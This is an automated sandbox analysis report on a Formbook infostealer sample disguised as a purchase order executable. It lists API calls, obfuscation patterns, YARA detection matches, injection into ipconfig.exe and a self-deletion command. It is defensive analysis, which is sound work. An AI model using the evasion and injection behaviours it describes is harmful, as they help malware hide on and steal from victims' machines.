Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9770 NtSetInformationFile,	1_2_00FC9770
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCA770 NtOpenThread,	1_2_00FCA770
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9760 NtOpenProcess,	1_2_00FC9760
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9730 NtQueryVirtualMemory,	1_2_00FC9730
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCA710 NtOpenProcessToken,	1_2_00FCA710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk,	5_2_02EB9A50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_02EB9860
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk,	5_2_02EB9840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk,	5_2_02EB99A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_02EB9910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_02EB96E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk,	5_2_02EB96D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk,	5_2_02EB9FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk,	5_2_02EB9780
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk,	5_2_02EB9710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB95D0 NtClose,LdrInitializeThunk,	5_2_02EB95D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk,	5_2_02EB9540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A80 NtOpenDirectoryObject,	5_2_02EB9A80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A20 NtResumeThread,	5_2_02EB9A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A00 NtProtectVirtualMemory,	5_2_02EB9A00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A10 NtQuerySection,	5_2_02EB9A10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBA3B0 NtGetContextThread,	5_2_02EBA3B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9B00 NtSetValueKey,	5_2_02EB9B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB98F0 NtReadVirtualMemory,	5_2_02EB98F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB98A0 NtWriteVirtualMemory,	5_2_02EB98A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBB040 NtSuspendThread,	5_2_02EBB040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9820 NtEnumerateKey,	5_2_02EB9820
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB99D0 NtCreateProcessEx,	5_2_02EB99D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9950 NtQueueApcThread,	5_2_02EB9950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9660 NtAllocateVirtualMemory,	5_2_02EB9660
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9670 NtQueryInformationProcess,	5_2_02EB9670
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9650 NtQueryValueKey,	5_2_02EB9650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9610 NtEnumerateValueKey,	5_2_02EB9610
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB97A0 NtUnmapViewOfSection,	5_2_02EB97A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9760 NtOpenProcess,	5_2_02EB9760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBA770 NtOpenThread,	5_2_02EBA770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9770 NtSetInformationFile,	5_2_02EB9770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9730 NtQueryVirtualMemory,	5_2_02EB9730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBA710 NtOpenProcessToken,	5_2_02EBA710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB95F0 NtQueryInformationFile,	5_2_02EB95F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9560 NtWriteFile,	5_2_02EB9560
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9520 NtWaitForSingleObject,	5_2_02EB9520
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBAD30 NtSetContextThread,	5_2_02EBAD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17BA0 NtCreateFile,	5_2_02B17BA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17CD0 NtClose,	5_2_02B17CD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17C50 NtReadFile,	5_2_02B17C50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17CCA NtClose,	5_2_02B17CCA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17C4C NtReadFile,	5_2_02B17C4C

Detected potential crypto function

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E9969	0_2_013E9969
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E91F9	0_2_013E91F9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E8D64	0_2_013E8D64
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E9D51	0_2_013E9D51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E9597	0_2_013E9597
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E07F6	0_2_013E07F6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041C16E	1_2_0041C16E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00408A40	1_2_00408A40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00408A3B	1_2_00408A3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041C52F	1_2_0041C52F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00402D8A	1_2_00402D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041BF03	1_2_0041BF03
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B090	1_2_00F9B090
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041002	1_2_01041002
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105E824	1_2_0105E824
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010520A8	1_2_010520A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010528EC	1_2_010528EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8F900	1_2_00F8F900
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01052B28	1_2_01052B28
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104DBD2	1_2_0104DBD2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010403DA	1_2_010403DA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103FA2B	1_2_0103FA2B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBEBB0	1_2_00FBEBB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010522AE	1_2_010522AE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAB40	1_2_00FAAB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01052D07	1_2_01052D07
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01051D55	1_2_01051D55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010525DD	1_2_010525DD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9841F	1_2_00F9841F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9D5E0	1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104D466	1_2_0104D466
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F80D20	1_2_00F80D20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA6E30	1_2_00FA6E30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105DFCE	1_2_0105DFCE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01051FF1	1_2_01051FF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104D616	1_2_0104D616
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01052EF7	1_2_01052EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F422AE	5_2_02F422AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2FA2B	5_2_02F2FA2B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3DBD2	5_2_02F3DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F303DA	5_2_02F303DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAEBB0	5_2_02EAEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AB40	5_2_02E9AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F42B28	5_2_02F42B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F428EC	5_2_02F428EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F420A8	5_2_02F420A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B090	5_2_02E8B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4E824	5_2_02F4E824
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F31002	5_2_02F31002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7F900	5_2_02E7F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F42EF7	5_2_02F42EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E96E30	5_2_02E96E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3D616	5_2_02F3D616
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F41FF1	5_2_02F41FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4DFCE	5_2_02F4DFCE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3D466	5_2_02F3D466
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8841F	5_2_02E8841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8D5E0	5_2_02E8D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F425DD	5_2_02F425DD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2581	5_2_02EA2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F41D55	5_2_02F41D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E70D20	5_2_02E70D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F42D07	5_2_02F42D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B08A3B	5_2_02B08A3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B08A40	5_2_02B08A40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1C16E	5_2_02B1C16E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B02FB0	5_2_02B02FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1BF03	5_2_02B1BF03
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B02D90	5_2_02B02D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B02D8A	5_2_02B02D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1C52F	5_2_02B1C52F

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 013E0550 appears 47 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 013EDBFD appears 32 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 013DB9F5 appears 624 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 00F8B150 appears 54 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02E7B150 appears 48 times

Sample file is different than original file name gathered from version info

Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe

Yara signature match

Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@17/13

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01

Source: Purchase Order 40,7045$.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Purchase Order 40,7045$.exe	Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

File read: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: unknown	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'	Jump to behavior

Source: Purchase Order 40,7045$.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,

0_2_013D7FB0

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E0595 push ecx; ret	0_2_013E05A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013DD44F push ecx; ret	0_2_013DD462
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00415913 push edx; retf	1_2_00415915
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041AC62 push D8D19732h; iretd	1_2_0041AC69
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414D57 push esi; retf	1_2_00414D58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041AD65 push eax; ret	1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414DEA push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041ADB2 push eax; ret	1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041ADBB push eax; ret	1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414E7E push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041AE1C push eax; ret	1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414E24 push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0040FF92 push 00000033h; iretd	1_2_0040FF98
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FDD0D1 push ecx; ret	1_2_00FDD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02ECD0D1 push ecx; ret	5_2_02ECD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B15913 push edx; retf	5_2_02B15915
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14E24 push eax; ret	5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1AE1C push eax; ret	5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14E7E push eax; ret	5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B0FF92 push 00000033h; iretd	5_2_02B0FF98
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1AC62 push D8D19732h; iretd	5_2_02B1AC69
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1ADB2 push eax; ret	5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1ADBB push eax; ret	5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14DEA push eax; ret	5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1AD65 push eax; ret	5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14D57 push esi; retf	5_2_02B14D58

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

